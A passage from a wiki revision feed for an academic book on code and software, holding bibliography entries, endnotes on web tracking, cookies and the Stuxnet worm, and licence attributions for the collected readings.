&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). [Eds: Can you review and revise this note where necessary]&lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4713</id>
		<title>Life in Code and Software/Attributions</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4713"/>
		<updated>2012-04-18T17:10:59Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Andersen, C. U. and Pold, S. (2011) 'The Scripted Spaces of Urban Ubiquitous Computing: The Experience, Poetics, and Politics of Public Scripted Space', ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-133-the-scripted-spaces-of-urban-ubiquitous-computing-the-experience-poetics-and-politics-of-public-scripted-space/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2008) 'A Contribution Towards a Grammar of Code', ''Fibreculture'', issue 13: n. pag. Web. 9 Nov 2009, accessed 16/03/2012, http://thirteen.fibreculturejournal.org/fcj-086-a-contribution-towards-a-grammar-of-code/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) Iteracy: Reading, Writing and Running Code, accessed 15/03/2012, http://stunlaw.blogspot.com/2011/09/iteracy-reading-writing-and-running.html ''(c) David M. Berry, made available here for reuse by permission of the author'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2012) ''Understanding Digital Humanities'', London: Palgrave Macmillan, accessed 15/03/2012, http://www.palgrave.com/PDFs/9780230292642.pdf ''(c) 2012 David M. Berry, Palgrave Macmillan, sample chapter available for open access'' &lt;br /&gt;
&lt;br /&gt;
Bogost, I. (2005) Procedural Literacy: Problem Solving with Programming, Systems, &amp;amp;amp; Play, Telemedium, accessed 15/03/2012, http://www.bogost.com/downloads/I.%20Bogost%20Procedural%20Literacy.pdf ''(c) 2005 Telemedium'' &lt;br /&gt;
&lt;br /&gt;
Chun, W. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16328263 ''(c) 2010 Wendy Chun'' &lt;br /&gt;
&lt;br /&gt;
Davidson, C. (2012) Why We Need a 4th R: Reading, wRiting, aRithmetic, algoRithms, DML Central, accessed 15/03/2012, http://dmlcentral.net/blog/cathy-davidson/why-we-need-4th-r-reading-writing-arithmetic-algorithms ''(c) 2012 C. Davidson, Creative Commons Attribution 3.0 License '' &lt;br /&gt;
&lt;br /&gt;
Deleuze, G. (1992) Postscript on the Societies of Control, ''October'', vol. 59, pp 3-7, accessed 15/03/2012, http://www.n5m.org/n5m2/media/texts/deleuze.htm ''(c) 1992 October/MIT Press'' &lt;br /&gt;
&lt;br /&gt;
Dijkstra, E. W. (1998) On the cruelty of really teaching computing science, accessed 15/03/2012, http://virtual.itca.edu.sv/dokeos/sinapsis/cd/doctos-sw-libre/docus-ewd/EWD1036%20-%20On%20the%20cruelty%20of%20really%20teaching%20computing%20scienc.pdf ''(c) 1998 Dijkstra, E. W.'' &lt;br /&gt;
&lt;br /&gt;
Gardner, M. (1970) The fantastic combinations of John Conway's new solitaire game &amp;quot;life&amp;quot;, Scientific American, 223 (October 1970): 120-123, accessed 15/03/2012, http://www.ibiblio.org/lifepatterns/october1970.html&lt;br /&gt;
''(c) 1970 Scientific American''&lt;br /&gt;
&lt;br /&gt;
Guattari, F. (1989) The Three Ecologies, ''New Formations'', no. 8, accessed 15/03/2012, http://www.amielandmelburn.org.uk/collections/newformations/08_131.pdf ''(c) New Formations'' &lt;br /&gt;
&lt;br /&gt;
Fogg, B. J., Cuellar, G., and Danielson, D. (2003) Motivating, Influencing, and Persuading Users, In Jacko, J. and Sears A. (eds.), The human-computer interaction handbook: fundamentals, evolving technologies, and emerging applications, accessed 15/03/2012, http://bjfogg.com/hci.pdf ''(c) 2003 Laurence Erbaum Associates'' &lt;br /&gt;
&lt;br /&gt;
Fuller, M. and Matos, S. (2011) Feral Computing: From Ubiquitous Calculation to Wild Interactions, ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-135-feral-computing-from-ubiquitous-calculation-to-wild-interactions/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16263212 ''(c) 2010 F. Frabetti'' &lt;br /&gt;
&lt;br /&gt;
Goetz, T. (2011) Harnessing the Power of Feedback Loops, Wired, accessed 12/09/2011, http://www.wired.com/magazine/2011/06/ff_feedbackloop/ ''(c) 2011 Wired'' &lt;br /&gt;
&lt;br /&gt;
Jerz, D. G. (2007) Somewhere Nearby is Colossal Cave: Examining Will Crowther's Original &amp;quot;Adventure&amp;quot; in Code and in Kentucky, Digital Humanities Quarterly, Volume 1 Number 2, accessed 15/03/2012, http://www.digitalhumanities.org/dhq/vol/001/2/000009/000009.html ''This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 License'' &lt;br /&gt;
&lt;br /&gt;
Kitchin, R. (2012) The Programmable City, Environment and Planning B: Planning and Design, volume 38, pages 945-951, accessed 15/03/2012, http://www.envplan.com/epb/editorials/b3806com.pdf ''Copyright © 2012 a Pion publication, Environment and Planning B: Planning and Design'' &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Latour, B. (2012) The Whole is Always Smaller Than Its Parts - A Digital Test of Gabriel Tarde’s Monads, ''British Journal of Sociology'', accessed 15/03/2012, http://www.bruno-latour.fr/sites/default/files/123-WHOLE-PART-FINAL.pdf&lt;br /&gt;
''(c) 2012 Bruno Latour/British Journal of Sociology''&lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2006) “The Problem of Computer Code: Leviathan or Common Power?” Institute for Cultural Research, Lancaster University. 10 August 2006, accessed 15/03/2012, http://www.lancs.ac.uk/staff/mackenza/papers/code-leviathan.pdf ''(c) 2006 Adrian MacKenzie'' &lt;br /&gt;
&lt;br /&gt;
MacKenzie, A. (2008) Wirelessness as Experience of Transition, Fibreculture, 13, accessed 15/03/2012, http://thirteen.fibreculturejournal.org/fcj-085-wirelessness-as-experience-of-transition/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Manovich, L. (2008) Software Takes Command, accessed 15/03/2012, http://lab.softwarestudies.com/2008/11/softbook.html ''Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Unported License'' &lt;br /&gt;
&lt;br /&gt;
Marino, Mark C. “Critical Code Studies” Electronic Book Review. 2006. Available at http://www.electronicbookreview.com/thread/electropoetics/codology ''Creative Commons: Attribution-NonCommercial-ShareAlike 2.5 Generic (CC BY-NC-SA 2.5)'' &lt;br /&gt;
&lt;br /&gt;
McCallum, L., and Smith, D. (2012) Show Us Your Screens, accessed 04/03/2012, http://vimeo.com/20241649 ''(c) McCallum, L., and Smith, D.'' &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf ''© 2012 ESET North America. All rights reserved. Trademarks used herein are trademarks or registered trademarks of ESET spol. s r.o. or ESET North America. Freely Available White Papers'' &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2011) Media Ecologies and Imaginary Media: Transversal Expansions, Contractions, and Foldings, Fibreculture, issue 19, accessed 15/03/2012, http://seventeen.fibreculturejournal.org/fcj-116-media-ecologies-and-imaginary-media-transversal-expansions-contractions-and-foldings/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Parisi, L. and Portanova, S. (2012) Soft Thought (in architecture and choreography), Computational Culture, issue 1, accessed 16/03/2012, http://computationalculture.net/article/soft-thought ''(c) 2012 Copyright the Authors, Computational Culture is an online open-access peer-reviewed journal'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2010) Algorithms are Thoughts, Chainsaws are Tools, accessed 04/03/2012, http://vimeo.com/9790850 ''(c) Stephan Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Ramsay, S. (2011) On Building, accessed 15/03/2012, http://lenz.unl.edu/papers/2011/01/11/on-building.html ''(c) Stephan Ramsay'' &lt;br /&gt;
&lt;br /&gt;
Slavin, K. (2010) How algorithms shape our world, TEDGlobal accessed 15/03/2012,http://www.ted.com/talks/kevin_slavin_how_algorithms_shape_our_world.html ''© TED CONFERENCES, LLC'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1936). &amp;quot;On Computable Numbers, with an Application to the Entscheidungs problem&amp;quot;. Proceedings of the London Mathematical Society. 2 42: 230–65, accessed 15/03/2012, http://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf ''(c) 1937 London Mathematical Society'' &lt;br /&gt;
&lt;br /&gt;
Turing, A.M. (1950). Computing machinery and intelligence. Mind, 59, 433-460. ''(c) 1950 Mind'' &lt;br /&gt;
&lt;br /&gt;
Weisstein, Eric W. &amp;quot;Turing Machine.&amp;quot; From MathWorld--A Wolfram Web Resource, accessed 15/03/2012, http://mathworld.wolfram.com/TuringMachine.html ''© 1999-2012 Wolfram Research, Inc.'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2006) Computational Thinking, Proceedings of the ACM, accessed 15/03/2012, http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/Wing06.pdf ''(c) Jeannette Wing'' &lt;br /&gt;
&lt;br /&gt;
Wing, J. M. (2009) Computational Thinking and Thinking About Computing, accessed 15/03/2012, http://www.youtube.com/watch?v=C2Pq4N-iE4I ''(c) Jeannette Wing, standard Youtube license'' &lt;br /&gt;
&lt;br /&gt;
Wolf, G. (2010) The Quantified Self, TED, accessed 15/03/2012, http://www.youtube.com/watch?v=OrAo8oBBFIo ''(c) 2010 TED CONFERENCES, LLC''&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4712</id>
		<title>Life in Code and Software/Attributions</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Attributions&amp;diff=4712"/>
		<updated>2012-04-18T16:13:49Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Andersen, C. U. and Pold, S. (2011) 'The Scripted Spaces of Urban Ubiquitous Computing: The Experience, Poetics, and Politics of Public Scripted Space', ''Fibreculture'', issue 19, accessed 15/03/2012, http://nineteen.fibreculturejournal.org/fcj-133-the-scripted-spaces-of-urban-ubiquitous-computing-the-experience-poetics-and-politics-of-public-scripted-space/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2008) 'A Contribution Towards a Grammar of Code', ''Fibreculture'', issue 13: n. pag. Web. 9 Nov 2009, accessed 16/03/2012, http://thirteen.fibreculturejournal.org/fcj-086-a-contribution-towards-a-grammar-of-code/ ''Creative Commons Attribution-NonCommercial-NoDerivs 2.5 Australia (CC BY-NC-ND 2.5)'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) Iteracy: Reading, Writing and Running Code, accessed 15/03/2012, http://stunlaw.blogspot.com/2011/09/iteracy-reading-writing-and-running.html ''(c) David M. Berry, made available here for reuse by permission of the author'' &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2012) 'Understanding Digital Humanities', London: Palgrave Macmillan, accessed 15/03/2012, http://www.palgrave.com/PDFs/9780230292642.pdf ''(c) 2012 David M. Berry, Palgrave Macmillan, sample chapter available for open access'' &lt;br /&gt;
&lt;br /&gt;
Bogost, I. (2005) Procedural Literacy: Problem Solving with Programming, Systems, &amp;amp;amp; Play, Telemedium, accessed 15/03/2012, http://www.bogost.com/downloads/I.%20Bogost%20Procedural%20Literacy.pdf ''(c) 2005 Telemedium'' &lt;br /&gt;
&lt;br /&gt;
Chun, W. (2010) Critical Code Studies, accessed 15/03/2012, http://vimeo.com/16328263 ''(c) 2010 Wendy Chun'' &lt;br /&gt;
&lt;br /&gt;
